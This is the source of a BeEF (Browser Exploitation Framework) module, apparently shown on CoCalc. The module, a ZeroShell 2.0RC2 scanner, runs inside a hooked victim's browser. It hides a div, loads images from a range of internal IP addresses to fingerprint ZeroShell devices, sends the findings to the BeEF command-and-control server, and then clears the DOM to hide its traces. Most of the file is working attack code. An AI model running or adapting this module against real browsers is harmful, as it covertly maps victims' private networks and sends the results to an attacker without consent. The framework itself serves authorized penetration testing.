CoCalc -- command.js

GitHub Repository: beefproject/beef
Path: blob/master/modules/exploits/zeroshell/zeroshell_2_0rc2_scanner/command.js
¹¹⁵⁴ views
1
//
2
// Copyright (c) 2006-2025 Wade Alcorn - [email protected]
3
// Browser Exploitation Framework (BeEF) - https://beefproject.com
4
// See the file 'doc/COPYING' for copying permission
5
//
6

7
var imgPath 	= "/kerbynet/Zeroshell.gif";		// fingerprint img to detect a ZeroShell instance
8
var ip_start 	= '<%= @ip_start %>'; 			// IP start range
9
var ip_end 	= '<%= @ip_end %>';			// IP end range
10
var timeout 	= '<%= @timeout %>';			// Timeout in ms to wait beetween each bloc scan and results sent to BeEF C&C (default 30000ms)
11
var ip_bloc 	= '<%= @ip_bloc %>';			// Size of each IP bloc to scan (default 100)
12

13
// Function added to convert string IPv4 to long
14
function ip2long(IP) {
15
  //  discuss at: http://phpjs.org/functions/ip2long/
16
  //  original by: Waldo Malqui Silva (http://waldo.malqui.info)
17
  //  improved by: Victor
18
  //  revised by: fearphage (http://http/my.opera.com/fearphage/)
19
  //  revised by: Theriault
20
  //   example 1: ip2long('192.0.34.166');
21
  //   returns 1: 3221234342
22
  //   example 2: ip2long('0.0xABCDEF');
23
  //   returns 2: 11259375
24
  //   example 3: ip2long('255.255.255.256');
25
  //   returns 3: false
26

27
  var i = 0;
28
  // PHP allows decimal, octal, and hexadecimal IP components.
29
  // PHP allows between 1 (e.g. 127) to 4 (e.g 127.0.0.1) components.
30
  IP = IP.match(
31
    /^([1-9]\d*|0[0-7]*|0x[\da-f]+)(?:\.([1-9]\d*|0[0-7]*|0x[\da-f]+))?(?:\.([1-9]\d*|0[0-7]*|0x[\da-f]+))?(?:\.([1-9]\d*|0[0-7]*|0x[\da-f]+))?$/i
32
  ); // Verify IP format.
33
  if (!IP) {
34
    // Invalid format.
35
    return false;
36
  }
37
  // Reuse IP variable for component counter.
38
  IP[0] = 0;
39
  for (i = 1; i < 5; i += 1) {
40
    IP[0] += !! ((IP[i] || '')
41
      .length);
42
    IP[i] = parseInt(IP[i]) || 0;
43
  }
44
  // Continue to use IP for overflow values.
45
  // PHP does not allow any component to overflow.
46
  IP.push(256, 256, 256, 256);
47
  // Recalculate overflow of last component supplied to make up for missing components.
48
  IP[4 + IP[0]] *= Math.pow(256, 4 - IP[0]);
49
  if (IP[1] >= IP[5] || IP[2] >= IP[6] || IP[3] >= IP[7] || IP[4] >= IP[8]) {
50
    return false;
51
  }
52
  return IP[1] * (IP[0] === 1 || 16777216) + IP[2] * (IP[0] <= 2 || 65536) + IP[3] * (IP[0] <= 3 || 256) + IP[4] * 1;
53
}
54

55
// Function added to convert long to string IPv4
56
function long2ip(ip) {
57
  //  discuss at: http://phpjs.org/functions/long2ip/
58
  //  original by: Waldo Malqui Silva (http://waldo.malqui.info)
59
  //   example 1: long2ip( 3221234342 );
60
  //   returns 1: '192.0.34.166'
61
  if (!isFinite(ip))
62
    return false;
63
  return [ip >>> 24, ip >>> 16 & 0xFF, ip >>> 8 & 0xFF, ip & 0xFF].join('.');
64
}
65

66
var ip_from_long 	= ip2long(ip_start); 	// Convert string IPv4 start range to long
67
var ip_to_long 		= ip2long(ip_end);		// Convert string IPv4 end range to long
68

69
beef.execute(function() {
70
	var result 	= ""; // Buffer to retrieve results
71
	var div 	= document.createElement('div'); // Hidden div container
72
	div.setAttribute('style', 'display:none;');
73
	document.body.appendChild(div);
74

75
	add = function(data){
76
		result += data + " ";
77
	}
78

79
	// Scan function to inject <img> markups in victim's DOM.
80
	// This function is recalled by herself to scan each IP bloc of the IP range defined
81
	scan = function(){
82
		var i = 0; // Counter compared to IP bloc size
83
		var ip_from_long_bloc = ip_from_long; // Save the begining IPv4 address for the current bloc
84
		beef.debug("[ZeroShell_2.0RC2_scanner] Scan the subnet block from " + long2ip(ip_from_long) + " to " + long2ip(ip_to_long) + ".");
85
		while((ip_from_long <= ip_to_long) && (i < ip_bloc)){
86
			var img = document.createElement('img');
87
			var ip = long2ip(ip_from_long);
88
			img.setAttribute('src', "http://" + ip + imgPath); 	// Payload to detect ZeroShell instance
89
			img.setAttribute('onload', "add('" + ip + "');");	// Event triggered of ZeroShell is detected
90
			div.appendChild(img); // Add current <img> markup to the hidden div in the victim's DOM
91
			ip_from_long++; // Increment long IPv4
92
			i++;
93
		}
94
		var ip_to_long_bloc = ip_from_long; // Save the ending IPv4 address for the current bloc
95

96
		// Function to return results of the current bloc scanned to BeEF C&C, after "timeout" ms waited.
97
		getResult = function(){
98
			if(result.trim() != "")
99
				beef.net.send("<%= @command_url %>", <%= @command_id %>, "Result= Bloc [" + long2ip(ip_from_long_bloc) + " - " + long2ip(ip_to_long_bloc-1) + "] ZeroShell(s) detected : [ " + result + "]", beef.are.status_success());
100
			else
101
				beef.net.send("<%= @command_url %>", <%= @command_id %>, "Result= Bloc [" + long2ip(ip_from_long_bloc) + " - " + long2ip(ip_to_long_bloc-1) + "] No ZeroShell detected on that IP range bloc...", beef.are.status_unknown());
102
			div.innerHTML = ""; // Clean the current DOM's div
103
			result = ""; // Clear the result of the bloc tested for the next loop
104
		}
105
		setTimeout("getResult()", timeout); // Wait "timeout" ms before sending results to BeEF C&C of the current bloc.
106
		if(ip_from_long <= ip_to_long) // While we don't have test all IPv4 in the range
107
			setTimeout("scan()", timeout*1.5); // Re-call the scan() function to proceed with the next bloc
108
		else // We have reach the last IP address to scan
109
			setTimeout(function(){ // Clear the victim's DOM and tell to BeEF C&C that the scan is complete
110
				document.body.removeChild(div);
111
				beef.net.send("<%= @command_url %>", <%= @command_id %>, "Result= Scan is complete on the defined range [" + ip_start + " - " + ip_end + "] (DOM cleared)", beef.are.status_success());
112
			}, timeout*2);
113
	}
114

115
	scan(); // Run the first bloc scan
116
});
117

118
Product

Resources

Company
